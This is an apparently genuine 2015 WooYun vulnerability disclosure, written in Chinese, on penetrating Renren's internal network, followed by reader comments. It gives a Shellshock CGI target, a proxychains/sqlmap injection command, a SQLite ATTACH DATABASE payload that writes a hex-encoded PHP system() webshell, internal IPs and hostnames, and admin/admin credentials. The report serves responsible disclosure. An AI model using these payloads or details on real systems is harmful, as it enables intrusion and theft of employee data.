缺陷编号:WooYun-2015-0128132
漏洞标题:人人网某业务命令执行导致内网沦陷引发的一系列安全问题
相关厂商:人人网
漏洞作者:redrain有节操
提交时间:2015-07-21 15:32
公开时间:2015-09-04 16:30
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-04: 细节向公众公开
(审核同学麻烦帮上传下外部图床的图片,我无法在乌云上上传图片)
17号开了乌云峰会,boooooom的议题讲内网的,其实并不是特别具有普遍性,只是进入内网的一个切入点,大部分企业的内网安全问题依然是攻击者从外围业务打开缺口全线业务代码泄漏,全体员工信息泄漏,可能影响用户数据,内部门户getshell,且已发现被入侵痕迹
target:http://118.186.217.122/存在shellshock:http://118.186.217.122/cgi-bin/test-cgi简单getshell后开始收集信息
确认主机在内网查看hosts确认其他网段10.4.24.0/2410.3.17.0/2410.3.16.0/2410.3.23.0/2410.5.16.0/24其中10.22.160.0/2410.22.198.0/24是数据段10.7.2.0/2410.2.10.0/2410.2.15.0/24是内部业务段常规的代理流量进入内网探测性扫描http://10.4.24.136/source/ 应该是对方的代码托管平台,基本上全线业务都在上面且没有认证即可查看下载,导致全线业务代码泄漏<img src="http://m1.yea.im/1pA.png" /><img src="http://m1.yea.im/1pB.png" />
1 |
mail.renren-inc.com 10.7.2.18meeting.renren-inc.com 10.2.10.23library.renren-inc.com 10.2.10.24we.renren-inc.com 10.2.15.80soft.opi-corp.com 10.2.15.42renren-inc.com 10.7.2.12 |
根据之前的扫描结果,直接对内部业务段进行渗透we.renren-inc.com/tongxunlu/应用存在注入,sqlite的数据库,影响全体员工数据
1 |
proxychains -q sqlmap -u "http://we.renren-inc.com/tongxunlu/addressListNote.php?id=1027*" |
可getshell,然而有个坑点需要编码处理
1 |
;ATTACH+DATABASE 'ztz.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (X'3c3f7068702073797374656d28245f524551554553545b615d293b203f3e');-- |
如此,可getshell<img src="http://m1.yea.im/1pE.png" />在此之前已有其他黑客入侵,请自查<img src="http://m1.yea.im/1pF.png" />其他还有诸如目录遍历,内部业务后台弱口令等等http://we.renren-inc.com/tongxunlu/adminadmin/adminhttp://we.renren-inc.com/tongxunlu/App_Data/可直接下载所有员工数据正要深入用户数据和办公段渗透时,外部业务下线了,但是全盘渗透仅仅只是时间问题,不再做敏感攻击
<img src="http://m1.yea.im/1pA.png" /><img src="http://m1.yea.im/1pB.png" /><img src="http://m1.yea.im/1pE.png" /><img src="http://m1.yea.im/1pF.png" />乌云图床有问题。。。剩下的传不上去图片。。。
人人应该被很多人都日穿过了吧,这个shell是好几个月前的了,一直存活到7月,安全部门应该定期进行自检内部业务相对脆弱,但是基本的开发安全习惯应该养成内网权限划分太差,流量无论是哪个网段都能通常
危害等级:高
漏洞Rank:10
确认时间:2015-07-2116:29
这边遗漏的坑太多,我们在不断踩坑埋坑,望大牛多多监督哈!
暂无
前排!
后排
大后排
大大后排
大大大后排
大大大大后排
大大大大大后排
大大大大大大后排
大大大大大大大后排
大大大大大大大大后排
大大大大大大大大大后排
大大大大大大大大大大后排
膜拜黑客们!
这么说,裤子又呗脱了?
原文连接
的情况下转载,若非则不得使用我方内容。